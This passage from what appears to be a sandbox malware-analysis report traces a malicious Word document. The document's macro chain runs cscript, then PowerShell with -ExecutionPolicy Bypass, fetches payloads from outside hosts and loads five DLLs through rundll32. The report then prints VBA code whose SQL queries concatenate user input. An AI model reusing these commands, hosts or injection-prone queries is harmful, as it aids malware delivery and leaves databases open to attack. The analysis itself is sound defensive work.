1 | 192.168.2.22 | 49168 | 136.243.74.161 | 443 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp | kBytes transferred | Direction | Data
2021-11-25 17:39:44 UTC | 0 | OUT | GET /cgi-sys/suspendedpage.cgi HTTP/1.1
Host: ghapan.com
2021-11-25 17:39:44 UTC | 1 | IN | HTTP/1.1 200 OK
Connection: close
Content-Type: text/html
Transfer-Encoding: chunked
Date: Thu, 25 Nov 2021 17:39:44 GMT
2021-11-25 17:39:44 UTC | 1 | IN | Data Ascii: 1dbe<!DOCTYPE html><html> <head> <meta http-equiv="Content-type" content="text/html; charset=utf-8"> <meta http-equiv="Cache-control" content="no-cache"> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Expires" conte
2021-11-25 17:39:44 UTC | 2 | IN | Data Ascii: 193px; } .info-heading { font-weight: bold; text-align: left; word-break: break-all; width: 100%; } .status-reason { font-size: 200%; display: block;
2021-11-25 17:39:44 UTC | 8 | IN | Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
2 | 192.168.2.22 | 49169 | 192.185.17.114 | 443 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp | kBytes transferred | Direction | Data
2021-11-25 17:39:46 UTC | 8 | OUT | GET /LUS1NTVui6/090921.html HTTP/1.1
Host: gruasingenieria.pe
Connection: Keep-Alive
2021-11-25 17:39:46 UTC | 8 | IN | HTTP/1.1 404 Not Found
Date: Thu, 25 Nov 2021 17:39:46 GMT
Server: Apache
Upgrade: h2,h2c
Connection: Upgrade, close
Last-Modified: Tue, 23 Apr 2019 06:20:01 GMT
Accept-Ranges: bytes
Content-Length: 746
Vary: Accept-Encoding
Content-Type: text/html
2021-11-25 17:39:46 UTC | 8 | IN | Data Ascii: <!doctype html><html lang="en"><head> <meta charset="utf-8"> <meta http-equiv="x-ua-compatible" content="ie=edge"> <title>404 Error</title> <meta name="viewport" content="width=device-width, initial-scale=1"> <meta name="robots" content="noind


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
3 | 192.168.2.22 | 49170 | 210.211.111.87 | 443 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp | kBytes transferred | Direction | Data
2021-11-25 17:39:48 UTC | 9 | OUT | GET /tDzEJ8uVGwdj/130921.html HTTP/1.1
Host: yoowi.net
Connection: Keep-Alive
2021-11-25 17:39:49 UTC | 9 | IN | HTTP/1.1 200 OK
Connection: close
Set-Cookie: WEB_VERSION=desktop; expires=Fri, 24-Dec-2021 21:39:48 GMT; Max-Age=2520000; path=/; domain=yoowi.net; secure
Set-Cookie: real_ipd=84.17.52.63; expires=Fri, 26-Nov-2021 03:39:48 GMT; Max-Age=36000; path=/; domain=yoowi.net; secure; HttpOnly
Set-Cookie: ECS_ID=53cd3a70d6c8e52d7d498bf9b2f08b102d43dc77; path=/; domain=yoowi.net; secure; HttpOnly
Cache-control: private
Content-Type: text/html; charset=utf-8
X-Powered-By: Dev By EcshopViet.com
Content-Length: 1984
Date: Thu, 25 Nov 2021 17:39:48 GMT
Server: LiteSpeed
2021-11-25 17:39:49 UTC | 10 | IN | Data Ascii: <!DOCTYPE html><html><head><meta name="generator" content="Ecshop 4.0 Custom by EcshopVietnam.com" /> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, height=device-height, initial-scale=1, maximum-scale=1, user-sc
2021-11-25 17:39:49 UTC | 11 | IN | Data Ascii: 4px auto; padding: 12px; } #header { padding: 6px ; text-align: center; } .status3xx {background-color: #475076; color: #FFFFFF;} .status4xx {background-color: #C55042; color: #FFFFFF;} .status5xx {


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
4 | 192.168.2.22 | 49171 | 143.95.80.83 | 443 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp | kBytes transferred | Direction | Data
2021-11-25 17:39:51 UTC | 12 | OUT | GET /7SEZBnhMLW/130921.html HTTP/1.1
Host: chaturanga.groopy.com
Connection: Keep-Alive
2021-11-25 17:39:51 UTC | 12 | IN | HTTP/1.1 302 Found
Date: Thu, 25 Nov 2021 17:39:51 GMT
Server: Apache
Location: https://chaturanga.groopy.com/cgi-sys/suspendedpage.cgi
Content-Length: 239
Connection: close
Content-Type: text/html; charset=iso-8859-1
2021-11-25 17:39:51 UTC | 12 | IN | Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>302 Found</title></head><body><h1>Found</h1><p>The document has moved <a href="https://chaturanga.groopy.com/cgi-sys/suspendedpage.cgi">here</a>.</p></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
5 | 192.168.2.22 | 49172 | 143.95.80.83 | 443 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp | kBytes transferred | Direction | Data
2021-11-25 17:39:52 UTC | 12 | OUT | GET /cgi-sys/suspendedpage.cgi HTTP/1.1
Host: chaturanga.groopy.com
2021-11-25 17:39:52 UTC | 12 | IN | HTTP/1.1 200 OK
Date: Thu, 25 Nov 2021 17:39:52 GMT
Server: Apache
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html
2021-11-25 17:39:52 UTC | 13 | IN | Data Ascii: 1dd4<!DOCTYPE html><html> <head> <meta http-equiv="Content-type" content="text/html; charset=utf-8"> <meta http-equiv="Cache-control" content="no-cache"> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Expires" conte
2021-11-25 17:39:52 UTC | 20 | IN | Data Ascii: 0


Code Manipulations

System Behavior

General

Start time: 18:39:21
Start date: 25/11/2021
Path: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Wow64 process (32bit): false
Commandline: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
Imagebase: 0x13fea0000
File size: 1423704 bytes
MD5 hash: 9EE74859D22DAE61F1750B3A1BACB6F5
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

                                                                                              General

                                                                                              Start time:18:39:32
                                                                                              Start date:25/11/2021
                                                                                              Path:C:\Windows\System32\cscript.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:"C:\Windows\System32\cscript.exe" C:\Users\user\AppData\Roaming\www.txt //E:VBScript //NoLogo %~f0 %*
                                                                                              Imagebase:0xff530000
                                                                                              File size:156160 bytes
                                                                                              MD5 hash:ECB021CA3370582F0C7244B0CF06732C
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Reputation:moderate

                                                                                              General

                                                                                              Start time:18:39:35
                                                                                              Start date:25/11/2021
                                                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass & C:\Users\user\AppData\Roaming\www.ps1
                                                                                              Imagebase:0x13f1c0000
                                                                                              File size:473600 bytes
                                                                                              MD5 hash:852D67A27E454BD389FA7F02A8CBE23F
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:.Net C# or VB.NET
                                                                                              Reputation:high

                                                                                              General

                                                                                              Start time:18:39:47
                                                                                              Start date:25/11/2021
                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:"C:\Windows\System32\cmd.exe" /c rundll32.exe C:\ProgramData\www1.dll,ldr
                                                                                              Imagebase:0x4a2b0000
                                                                                              File size:345088 bytes
                                                                                              MD5 hash:5746BD7E255DD6A8AFA06F7C42C1BA41
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Reputation:high

                                                                                              General

                                                                                              Start time:18:39:47
                                                                                              Start date:25/11/2021
                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:"C:\Windows\System32\cmd.exe" /c rundll32.exe C:\ProgramData\www2.dll,ldr
                                                                                              Imagebase:0x4a2b0000
                                                                                              File size:345088 bytes
                                                                                              MD5 hash:5746BD7E255DD6A8AFA06F7C42C1BA41
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Reputation:high

                                                                                              General

                                                                                              Start time:18:39:48
                                                                                              Start date:25/11/2021
                                                                                              Path:C:\Windows\System32\rundll32.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:rundll32.exe C:\ProgramData\www1.dll,ldr
                                                                                              Imagebase:0xff550000
                                                                                              File size:45568 bytes
                                                                                              MD5 hash:DD81D91FF3B0763C392422865C9AC12E
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Reputation:high

                                                                                              General

                                                                                              Start time:18:39:48
                                                                                              Start date:25/11/2021
                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:"C:\Windows\System32\cmd.exe" /c rundll32.exe C:\ProgramData\www3.dll,ldr
                                                                                              Imagebase:0x4a2b0000
                                                                                              File size:345088 bytes
                                                                                              MD5 hash:5746BD7E255DD6A8AFA06F7C42C1BA41
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Reputation:high

                                                                                              General

                                                                                              Start time:18:39:48
                                                                                              Start date:25/11/2021
                                                                                              Path:C:\Windows\System32\rundll32.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:rundll32.exe C:\ProgramData\www2.dll,ldr
                                                                                              Imagebase:0xff550000
                                                                                              File size:45568 bytes
                                                                                              MD5 hash:DD81D91FF3B0763C392422865C9AC12E
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Reputation:high

                                                                                              General

                                                                                              Start time:18:39:49
                                                                                              Start date:25/11/2021
                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:"C:\Windows\System32\cmd.exe" /c rundll32.exe C:\ProgramData\www4.dll,ldr
                                                                                              Imagebase:0x4a2b0000
                                                                                              File size:345088 bytes
                                                                                              MD5 hash:5746BD7E255DD6A8AFA06F7C42C1BA41
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Reputation:high

                                                                                              General

                                                                                              Start time:18:39:49
                                                                                              Start date:25/11/2021
                                                                                              Path:C:\Windows\System32\rundll32.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:rundll32.exe C:\ProgramData\www3.dll,ldr
                                                                                              Imagebase:0xff550000
                                                                                              File size:45568 bytes
                                                                                              MD5 hash:DD81D91FF3B0763C392422865C9AC12E
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Reputation:high

                                                                                              General

                                                                                              Start time:18:39:49
                                                                                              Start date:25/11/2021
                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:"C:\Windows\System32\cmd.exe" /c rundll32.exe C:\ProgramData\www5.dll,ldr
                                                                                              Imagebase:0x4a2b0000
                                                                                              File size:345088 bytes
                                                                                              MD5 hash:5746BD7E255DD6A8AFA06F7C42C1BA41
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language

                                                                                              General

                                                                                              Start time:18:39:50
                                                                                              Start date:25/11/2021
                                                                                              Path:C:\Windows\System32\rundll32.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:rundll32.exe C:\ProgramData\www4.dll,ldr
                                                                                              Imagebase:0xff550000
                                                                                              File size:45568 bytes
                                                                                              MD5 hash:DD81D91FF3B0763C392422865C9AC12E
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language

                                                                                              General

                                                                                              Start time:18:39:50
                                                                                              Start date:25/11/2021
                                                                                              Path:C:\Windows\System32\rundll32.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:rundll32.exe C:\ProgramData\www5.dll,ldr
                                                                                              Imagebase:0xff550000
                                                                                              File size:45568 bytes
                                                                                              MD5 hash:DD81D91FF3B0763C392422865C9AC12E
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language

                                                                                              Disassembly

                                                                                              Code Analysis

                                                                                              Module: Module1

Declaration
Line | Content
1 | Attribute VB_Name = "Module1"
2 | Option Explicit
3 | Global con as ADODB.Connection
4 | Global rs as ADODB.Recordset

                                                                                              Non-Executed Functions
APIs | Meta Information
cboSea
Open
txtSea
adOpenStatic
adLockOptimistic
cboSea
Open
txtSea
adOpenStatic
adLockOptimistic
cboSea
Open
txtSea
adOpenStatic
adLockOptimistic
DataGrid1

Strings | Decrypted Strings
                                                                                              "ID"
                                                                                              "Select * from Tbl_STUDENTS ""where ID = '"
                                                                                              "Select * from Tbl_STUDENTS ""where ID = '"
                                                                                              "Lastname"
                                                                                              "Select * from dbo.Tbl_STUDENTS ""where Lastname = '"
                                                                                              "Select * from dbo.Tbl_STUDENTS ""where Lastname = '"
                                                                                              "Course"
                                                                                              "Select * from dbo.Tbl_STUDENTS ""where Course = '"
                                                                                              "Select * from dbo.Tbl_STUDENTS ""where Course = '"
Line | Instruction | Meta Information
35 | Public Sub Search_Trans1() |
36 | Set rs = New ADODB.Recordset |
37 | If frmTrans1.cboSea.Text = "ID" Then | cboSea
38 | rs.Open "Select * from Tbl_STUDENTS " & "where ID = '" & frmTrans1.txtSea.Text & "'", con, adOpenStatic, adLockOptimistic | Open, txtSea, adOpenStatic, adLockOptimistic
41 | Elseif frmTrans1.cboSea.Text = "Lastname" Then | cboSea
42 | rs.Open "Select * from dbo.Tbl_STUDENTS " & "where Lastname = '" & frmTrans1.txtSea.Text & "'", con, adOpenStatic, adLockOptimistic | Open, txtSea, adOpenStatic, adLockOptimistic
45 | Elseif frmTrans1.cboSea.Text = "Course" Then | cboSea
46 | rs.Open "Select * from dbo.Tbl_STUDENTS " & "where Course = '" & frmTrans1.txtSea.Text & "'", con, adOpenStatic, adLockOptimistic | Open, txtSea, adOpenStatic, adLockOptimistic
49 | Endif |
50 | Set frmTrans1.DataGrid1.DataSource = rs | DataGrid1
51 | End Sub |

APIs | Meta Information
cboSBook
Open
txtSBook
adOpenStatic
adLockOptimistic
cboSBook
Open
txtSBook
adOpenStatic
adLockOptimistic
DataGrid4

Strings | Decrypted Strings
                                                                                              "Call no"
                                                                                              "Select * from Tbl_BOOK ""where Call_no = '"
                                                                                              "Select * from Tbl_BOOK ""where Call_no = '"
                                                                                              "Book Name"
                                                                                              "Select * from dbo.Tbl_BOOK ""where Title = '"
                                                                                              "Select * from dbo.Tbl_BOOK ""where Title = '"
Line | Instruction | Meta Information
53 | Public Sub Search_Book1() |
54 | Set rs = New ADODB.Recordset |
55 | If frmTrans1.cboSBook.Text = "Call no" Then | cboSBook
56 | rs.Open "Select * from Tbl_BOOK " & "where Call_no = '" & frmTrans1.txtSBook & "'", con, adOpenStatic, adLockOptimistic | Open, txtSBook, adOpenStatic, adLockOptimistic
59 | Elseif frmTrans1.cboSBook.Text = "Book Name" Then | cboSBook

                                                                                              60

                                                                                              rs.Open "Select * from dbo.Tbl_BOOK " & "where Title = '" & frmTrans1.txtSBook.Text & "'", con, adOpenStatic, adLockOptimistic

                                                                                              Open

                                                                                              txtSBook

                                                                                              adOpenStatic

                                                                                              adLockOptimistic

                                                                                              63

                                                                                              Endif

                                                                                              64

                                                                                              Set frmTrans1.DataGrid4.DataSource = rs

                                                                                              DataGrid4

                                                                                              65

                                                                                              End Sub

                                                                                              APIs | Meta Information

                                                                                              Open

                                                                                              Item

                                                                                              adOpenStatic

                                                                                              adLockOptimistic

                                                                                              txtCall_no

                                                                                              txtTitle

                                                                                              txtAuthor

                                                                                              txtACC

                                                                                              txtBorrow

                                                                                              txtDue

                                                                                              txtReturned

                                                                                              txtRemarks

                                                                                              Strings | Decrypted Strings
                                                                                              "select * from dbo.Tbl_TRANSACTION where dbo.Tbl_TRANSACTION.ID='"
                                                                                              "Returned"
                                                                                              Line | Instruction | Meta Information
                                                                                              123

                                                                                              Public Sub Returned()

                                                                                              124

                                                                                              Set rs = New ADODB.Recordset

                                                                                              125

                                                                                              rs.Open "select * from dbo.Tbl_TRANSACTION where dbo.Tbl_TRANSACTION.ID='" & frmTrans1.Datagrid3.Columns.Item(3).Text & "'", con, adOpenStatic, adLockOptimistic

                                                                                              Open

                                                                                              Item

                                                                                              adOpenStatic

                                                                                              adLockOptimistic

                                                                                              126

                                                                                              frmTrans1.txtCall_no.Text = rs!Call_no

                                                                                              txtCall_no

                                                                                              127

                                                                                              frmTrans1.txtTitle.Text = rs!Title

                                                                                              txtTitle

                                                                                              128

                                                                                              frmTrans1.txtAuthor.Text = rs!Author

                                                                                              txtAuthor

                                                                                              129

                                                                                              frmTrans1.txtACC.Text = rs!Acc_no

                                                                                              txtACC

                                                                                              130

                                                                                              frmTrans1.txtBorrow.Text = rs!Date_Borrowed

                                                                                              txtBorrow

                                                                                              131

                                                                                              frmTrans1.txtDue.Text = rs!Date_Due

                                                                                              txtDue

                                                                                              132

                                                                                              frmTrans1.txtReturned.Text = rs!Date_Returned

                                                                                              txtReturned

                                                                                              133

                                                                                              frmTrans1.txtRemarks.Text = "Returned"

                                                                                              txtRemarks

                                                                                              134

                                                                                              End Sub

                                                                                              APIs | Meta Information

                                                                                              Execute

                                                                                              txtID

                                                                                              txtCall_no

                                                                                              txtTitle

                                                                                              txtAuthor

                                                                                              txtACC

                                                                                              txtBorrow

                                                                                              txtDue

                                                                                              txtReturned

                                                                                              txtRemarks

                                                                                              palen

                                                                                              Strings | Decrypted Strings
                                                                                              "insert into dbo.Tbl_TRANSACTION values(""'"
                                                                                              Line | Instruction | Meta Information
                                                                                              98

                                                                                              Public Sub OkBorrowed()

                                                                                              99

                                                                                              con.Execute "insert into dbo.Tbl_TRANSACTION values(" & "'" & frmTrans1.txtID.Text & "'," & "'" & frmTrans1.txtCall_no.Text & "'," & "'" & frmTrans1.txtTitle.Text & "'," & "'" & frmTrans1.txtAuthor.Text & "'," & "'" & frmTrans1.txtACC.Text & "'," & "'" & frmTrans1.txtBorrow.Text & "'," & "'" & frmTrans1.txtDue.Text & "'," & "'" & frmTrans1.txtReturned.Text & "'," & "'" & frmTrans1.txtRemarks.Text & "')"

                                                                                              Execute

                                                                                              txtID

                                                                                              txtCall_no

                                                                                              txtTitle

                                                                                              txtAuthor

                                                                                              txtACC

                                                                                              txtBorrow

                                                                                              txtDue

                                                                                              txtReturned

                                                                                              txtRemarks

                                                                                              109

                                                                                              frmTrans1.palen.Caption = 1

                                                                                              palen

                                                                                              110

                                                                                              End Sub

                                                                                              APIs | Meta Information

                                                                                              Execute

                                                                                              txtCall_no

                                                                                              frmTrans1

                                                                                              txtTitle

                                                                                              txtAuthor

                                                                                              txtBorrow

                                                                                              txtDue

                                                                                              txtReturned

                                                                                              txtRemarks

                                                                                              txtID

                                                                                              Strings | Decrypted Strings
                                                                                              "update dbo.Tbl_TRANSACTION set ""Call_no = '"
                                                                                              Line | Instruction | Meta Information
                                                                                              136

                                                                                              Public Sub Returned1()

                                                                                              137

                                                                                              con.Execute "update dbo.Tbl_TRANSACTION set " & "Call_no = '" & frmTrans1.txtCall_no.Text & "', " & "Title = '" & frmTrans1.txtTitle.Text & "', " & "Author='" & frmTrans1.txtAuthor.Text & "', " & "Date_Borrowed='" & frmTrans1.txtBorrow.Text & "', " & "Date_Due='" & frmTrans1.txtDue.Text & "', " & "Date_Returned = '" & frmTrans1.txtReturned.Text & "', " & "Status = '" & frmTrans1.txtRemarks.Text & "'" & "where dbo.Tbl_TRANSACTION.ID='" & frmTrans1.txtID.Text & "'"

                                                                                              Execute

                                                                                              txtCall_no

                                                                                              frmTrans1

                                                                                              txtTitle

                                                                                              txtAuthor

                                                                                              txtBorrow

                                                                                              txtDue

                                                                                              txtReturned

                                                                                              txtRemarks

                                                                                              txtID

                                                                                              147

                                                                                              End Sub

                                                                                              APIs | Meta Information

                                                                                              Open

                                                                                              Item

                                                                                              adOpenStatic

                                                                                              adLockOptimistic

                                                                                              txtCall_no

                                                                                              txtTitle

                                                                                              txtAuthor

                                                                                              txtACC

                                                                                              Strings | Decrypted Strings
                                                                                              "select * from dbo.Tbl_BOOK where dbo.Tbl_BOOK.Call_no= ""'"
                                                                                              Line | Instruction | Meta Information
                                                                                              19

                                                                                              Public Sub Edit_Book_Tran()

                                                                                              20

                                                                                              Set rs = New ADODB.Recordset

                                                                                              21

                                                                                              rs.Open "select * from dbo.Tbl_BOOK where dbo.Tbl_BOOK.Call_no= " & "'" & frmTrans1.DataGrid4.Columns.Item(0).Text & "'", con, adOpenStatic, adLockOptimistic

                                                                                              Open

                                                                                              Item

                                                                                              adOpenStatic

                                                                                              adLockOptimistic

                                                                                              23

                                                                                              frmTrans1.txtCall_no.Text = rs!Call_no

                                                                                              txtCall_no

                                                                                              24

                                                                                              frmTrans1.txtTitle.Text = rs!Title

                                                                                              txtTitle

                                                                                              25

                                                                                              frmTrans1.txtAuthor.Text = rs!Author

                                                                                              txtAuthor

                                                                                              26

                                                                                              frmTrans1.txtACC.Text = rs!Acc_no

                                                                                              txtACC

                                                                                              27

                                                                                              End Sub

                                                                                              APIs | Meta Information

                                                                                              Open

                                                                                              Item

                                                                                              adOpenStatic

                                                                                              adLockOptimistic

                                                                                              txtID

                                                                                              lblname

                                                                                              lblmi

                                                                                              lbllast

                                                                                              Strings | Decrypted Strings
                                                                                              "Select * from dbo.Tbl_STUDENTS where dbo.Tbl_STUDENTS.ID= ""'"
                                                                                              Line | Instruction | Meta Information
                                                                                              68

                                                                                              Public Sub Datagrid_Trans1()

                                                                                              69

                                                                                              Set rs = New ADODB.Recordset

                                                                                              70

                                                                                              rs.Open "Select * from dbo.Tbl_STUDENTS where dbo.Tbl_STUDENTS.ID= " & "'" & frmTrans1.DataGrid1.Columns.Item(0).Text & "'", con, adOpenStatic, adLockOptimistic

                                                                                              Open

                                                                                              Item

                                                                                              adOpenStatic

                                                                                              adLockOptimistic

                                                                                              72

                                                                                              frmTrans1.txtID.Text = rs!ID

                                                                                              txtID

                                                                                              73

                                                                                              frmTrans1.lblname.Caption = rs!Firstname

                                                                                              lblname

                                                                                              74

                                                                                              frmTrans1.lblmi.Caption = rs!MI

                                                                                              lblmi

                                                                                              75

                                                                                              frmTrans1.lbllast.Caption = rs!Lastname

                                                                                              lbllast

                                                                                              76

                                                                                              End Sub

                                                                                              APIs | Meta Information

                                                                                              Open

                                                                                              Item

                                                                                              adOpenStatic

                                                                                              adLockOptimistic

                                                                                              txtCall_no

                                                                                              txtTitle

                                                                                              txtAuthor

                                                                                              txtACC

                                                                                              Strings | Decrypted Strings
                                                                                              "Select * from dbo.Tbl_TRANSACTION where dbo.Tbl_TRANSACTION.Call_no= ""'"
                                                                                              Line | Instruction | Meta Information
                                                                                              113

                                                                                              Public Sub Display_list()

                                                                                              114

                                                                                              Set rs = New ADODB.Recordset

                                                                                              115

                                                                                              rs.Open "Select * from dbo.Tbl_TRANSACTION where dbo.Tbl_TRANSACTION.Call_no= " & "'" & frmTrans1.Datagrid3.Columns.Item(0).Text & "'", con, adOpenStatic, adLockOptimistic

                                                                                              Open

                                                                                              Item

                                                                                              adOpenStatic

                                                                                              adLockOptimistic

                                                                                              117

                                                                                              frmTrans1.txtCall_no.Text = rs!Call_no

                                                                                              txtCall_no

                                                                                              118

                                                                                              frmTrans1.txtTitle.Text = rs!Title

                                                                                              txtTitle

                                                                                              119

                                                                                              frmTrans1.txtAuthor.Text = rs!Author

                                                                                              txtAuthor

                                                                                              120

                                                                                              frmTrans1.txtACC.Text = rs!Acc_no

                                                                                              txtACC

                                                                                              121

                                                                                              End Sub

                                                                                              APIs | Meta Information

                                                                                              Open

                                                                                              txtID

                                                                                              adOpenStatic

                                                                                              adLockOptimistic

                                                                                              Datagrid3

                                                                                              Strings | Decrypted Strings
                                                                                              "select *from Tbl_Transaction where ID ='"
                                                                                              Line | Instruction | Meta Information
                                                                                              78

                                                                                              Public Sub Display_borrower()

                                                                                              79

                                                                                              Set rs = New ADODB.Recordset

                                                                                              80

                                                                                              rs.Open "select *from Tbl_Transaction where ID ='" & frmTrans1.txtID.Text & "'", con, adOpenStatic, adLockOptimistic

                                                                                              Open

                                                                                              txtID

                                                                                              adOpenStatic

                                                                                              adLockOptimistic

                                                                                              81

                                                                                              Set frmTrans1.Datagrid3.DataSource = rs

                                                                                              Datagrid3

                                                                                              83

                                                                                              End Sub

APIs | Meta Information
Open
adOpenStatic
adLockOptimistic
DataGrid1

Strings | Decrypted Strings
"select * from dbo.Tbl_STUDENTS"

Line | Instruction | Meta Information
29 | Public Sub View_StudentS_Trans1() |
30 | Set rs = New ADODB.Recordset |
31 | rs.Open "select * from dbo.Tbl_STUDENTS", con, adOpenStatic, adLockOptimistic | Open, adOpenStatic, adLockOptimistic
32 | Set frmTrans1.DataGrid1.DataSource = rs | DataGrid1
33 | End Sub |

APIs | Meta Information
Open
adOpenStatic
adLockOptimistic
DataGrid4

Strings | Decrypted Strings
"select * from dbo.Tbl_BOOK"

Line | Instruction | Meta Information
91 | Public Sub View_Trans3result() |
92 | Set rs = New ADODB.Recordset |
93 | rs.Open "select * from dbo.Tbl_BOOK", con, adOpenStatic, adLockOptimistic | Open, adOpenStatic, adLockOptimistic
94 | Set frmTrans1.DataGrid4.DataSource = rs | DataGrid4
95 | End Sub |

APIs | Meta Information
Execute
Item

Strings | Decrypted Strings
"Delete from dbo.Tbl_TRANSACTION"" where ID = '"

Line | Instruction | Meta Information
149 | Public Sub Delete() |
150 | con.Execute "Delete from dbo.Tbl_TRANSACTION" & " where ID = '" & frmBorrower.DataGrid1.Columns.Item(0).Text & "'" | Execute, Item
152 | End Sub |

APIs | Meta Information
Open

Strings | Decrypted Strings
"Provider=SQLOLEDB.1;Integrated Security=SSPI;Persist Security Info=False;Initial Catalog=LIBRARY;Data Source=PALEN\SQLPALENSERVER"

Line | Instruction | Meta Information
6 | Public Sub Connect_Student_Trans1() |
7 | On Error Resume Next |
8 | Set con = New ADODB.Connection |
9 | con.Open "Provider=SQLOLEDB.1;Integrated Security=SSPI;Persist Security Info=False;Initial Catalog=LIBRARY;Data Source=PALEN\SQLPALENSERVER" | Open
11 | End Sub |

Module: Module2

Declaration
Line | Content
1 | Attribute VB_Name = "Module2"
2 | Option Explicit
3 | Global con as ADODB.Connection
4 | Global rs as ADODB.Recordset

Non-Executed Functions

APIs | Meta Information
cboSea
Open
txtSea
adOpenStatic
adLockOptimistic
cboSea
Open
txtSea
adOpenStatic
adLockOptimistic
cboSea
Open
txtSea
adOpenStatic
adLockOptimistic
DataGrid1

Strings | Decrypted Strings
"ID"
"Select * from Tbl_STUDENTS ""where ID = '"
"Select * from Tbl_STUDENTS ""where ID = '"
"Lastname"
"Select * from dbo.Tbl_STUDENTS ""where Lastname = '"
"Select * from dbo.Tbl_STUDENTS ""where Lastname = '"
"Course"
"Select * from dbo.Tbl_STUDENTS ""where Course = '"
"Select * from dbo.Tbl_STUDENTS ""where Course = '"

Line | Instruction | Meta Information
35 | Public Sub Search_Trans1() |
36 | Set rs = New ADODB.Recordset |
37 | If frmTrans1.cboSea.Text = "ID" Then | cboSea
38 | rs.Open "Select * from Tbl_STUDENTS " & "where ID = '" & frmTrans1.txtSea.Text & "'", con, adOpenStatic, adLockOptimistic | Open, txtSea, adOpenStatic, adLockOptimistic
41 | Elseif frmTrans1.cboSea.Text = "Lastname" Then | cboSea
42 | rs.Open "Select * from dbo.Tbl_STUDENTS " & "where Lastname = '" & frmTrans1.txtSea.Text & "'", con, adOpenStatic, adLockOptimistic | Open, txtSea, adOpenStatic, adLockOptimistic
45 | Elseif frmTrans1.cboSea.Text = "Course" Then | cboSea
46 | rs.Open "Select * from dbo.Tbl_STUDENTS " & "where Course = '" & frmTrans1.txtSea.Text & "'", con, adOpenStatic, adLockOptimistic | Open, txtSea, adOpenStatic, adLockOptimistic
49 | Endif |
50 | Set frmTrans1.DataGrid1.DataSource = rs | DataGrid1
51 | End Sub |

APIs | Meta Information
cboSBook
Open
txtSBook
adOpenStatic
adLockOptimistic
cboSBook
Open
txtSBook
adOpenStatic
adLockOptimistic
DataGrid4

Strings | Decrypted Strings
"Call no"
"Select * from Tbl_BOOK ""where Call_no = '"
"Select * from Tbl_BOOK ""where Call_no = '"
"Book Name"
"Select * from dbo.Tbl_BOOK ""where Title = '"
"Select * from dbo.Tbl_BOOK ""where Title = '"

Line | Instruction | Meta Information
53 | Public Sub Search_Book1() |
54 | Set rs = New ADODB.Recordset |
55 | If frmTrans1.cboSBook.Text = "Call no" Then | cboSBook
56 | rs.Open "Select * from Tbl_BOOK " & "where Call_no = '" & frmTrans1.txtSBook & "'", con, adOpenStatic, adLockOptimistic | Open, txtSBook, adOpenStatic, adLockOptimistic
59 | Elseif frmTrans1.cboSBook.Text = "Book Name" Then | cboSBook
60 | rs.Open "Select * from dbo.Tbl_BOOK " & "where Title = '" & frmTrans1.txtSBook.Text & "'", con, adOpenStatic, adLockOptimistic | Open, txtSBook, adOpenStatic, adLockOptimistic
63 | Endif |
64 | Set frmTrans1.DataGrid4.DataSource = rs | DataGrid4
65 | End Sub |

APIs | Meta Information
Open
Item
adOpenStatic
adLockOptimistic
txtCall_no
txtTitle
txtAuthor
txtACC
txtBorrow
txtDue
